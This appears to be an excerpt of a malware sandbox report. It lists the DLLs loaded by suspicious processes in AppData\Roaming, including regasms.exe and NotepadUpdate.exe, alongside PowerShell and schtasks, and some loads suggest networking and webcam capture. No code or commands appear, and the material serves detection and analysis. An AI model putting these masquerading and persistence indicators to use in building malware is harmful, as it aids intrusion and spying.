                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cryptnet.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: webio.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: cabinet.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: sxs.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: devenum.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: devobj.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msdmo.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: avicap32.dll
                  Source: C:\Users\user\AppData\Roaming\regasms.exeSection loaded: msvfw32.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeSection loaded: windows.storage.dll
